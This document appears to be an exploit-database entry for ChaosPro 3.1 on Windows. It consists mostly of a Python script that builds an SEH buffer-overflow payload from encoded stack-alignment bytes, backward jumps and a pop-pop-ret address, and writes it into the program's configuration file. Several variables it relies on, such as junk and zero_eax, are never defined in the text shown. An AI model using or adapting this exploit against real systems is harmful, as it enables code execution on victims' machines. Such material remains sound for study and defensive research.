Exploits / Vulnerability Discovered : 2019-09-02 |
Type : local |
Platform : windows
This exploit / vulnerability Chaospro 3.1 seh buffer overflow is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!C:\Python27\python.exe
# Title : ChaosPro 3.1
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
# our egg!
payload = "T00WT00W"
# adjust the stack from 00F2FFA6 to 00F2FFA8
payload += "\x83\xC4\x02"
# ok, lets start working stuff here ... we have 126 bytesish ...
junk += zero_eax
junk += push_esp + pop_eax # push esp, pop eax
junk += align_stack
junk += push_eax
junk += pop_esp
# first section into the stack
# e7 ff e4 75
# good
junk += zero_eax
junk += "\x2d\x89\x88\x87\x86"
junk += "\x2d\x01\x8f\x77\x8f"
junk += "\x2d\x01\x04\x01\x02"
junk += push_eax
# second section into the stack
# af e7 75 af
# good
junk += zero_eax
junk += "\x2d\x4f\x4e\x4d\x4c"
junk += "\x2d\x01\x39\x8f\x02"
junk += "\x2d\x01\x03\x3c\x01"
junk += push_eax
# third section into the stack
# d7 89 57 30
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x74\x73"
junk += "\x2d\x3e\x19\x01\x8f"
junk += "\x2d\x03\x01\x01\x26"
junk += push_eax
# size for section one
junk += "A" * (
126
- 9 # nopsled
# first set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
# second set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
# third set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
)
# baby nopslep just for breathing room
junk += "AAAA"
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80
#Section Two
# baby nopsled
junk += "AAA"
# fourth section into the stack part two
# 30 54 b8 ec
# fourth section into the stack part one
junk += zero_eax
junk += "\x2d\x80\x15\x75\x75"
junk += "\x2d\x80\x20\x32\x35"
junk += "\x2d\x14\x11\x04\x25"
junk += push_eax
# fifth section into the stack
# 74 5a 05 3c
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x89"
junk += "\x2d\x34\x6b\x17\x01"
junk += "\x2d\x01\x01\x01\x01"
junk += push_eax
# sixth section into the stack
# 2e cd 58 53
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x1d\x18\x8e\x43"
junk += "\x2d\x01\x01\x17\x01"
junk += push_eax
# seventh section into the stack
# 43 43 db 31
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x3e\x7f\x2d\x2d"
junk += "\x2d\x02\x17\x01\x03"
junk += push_eax
junk += "A" * (
126 # amount of room before we need to jump
- 3 # baby nopsled
# part one of fourth set of bytes going onto the stack
- len(zero_eax)
# part two of fourth sec of bytes going onto the stack
- 15
- len(push_eax)
# fifth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
# sixth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
# seventh set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
- 4 # baby nopsled
- len(jmpback80)
)
# Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80
# baby nopsled
junk += "AAAA"
# eighth section into the stack part two
# 52 42 0f ff
# good
# eighth section into the stack part one
junk += zero_eax
junk += "\x2d\x65\x65\x75\x75"
junk += "\x2d\x65\x65\x25\x25"
junk += "\x2d\x37\x25\x23\x13"
junk += push_eax
# ninth section into the stack
# ca 81 66 43
# good
junk += zero_eax
junk += "\x2d\x8f\x81\x7c\x7b"
junk += "\x2d\x2d\x17\x01\x8f"
junk += "\x2d\x01\x01\x01\x2b"
junk += push_eax
junk += "A" * (
126 # amount of room before we need to jump
- len(jmpback80)
- 4 # baby nopsled
# eighth set of bytes going onto the stack
# eighth section
- len(zero_eax)
- 15
- len(push_eax)
# ninth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
- len(jmpforward06)
)
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80
#seh address for pop, pop and ret with a 0x00 at the end ...
junk += "\x5d\x10\x40"
# write the evil file
with open('C:\\Program Files\\ChaosPro3.1\\ChaosPro.cfg', 'w') as the_file:
the_file.write(junk)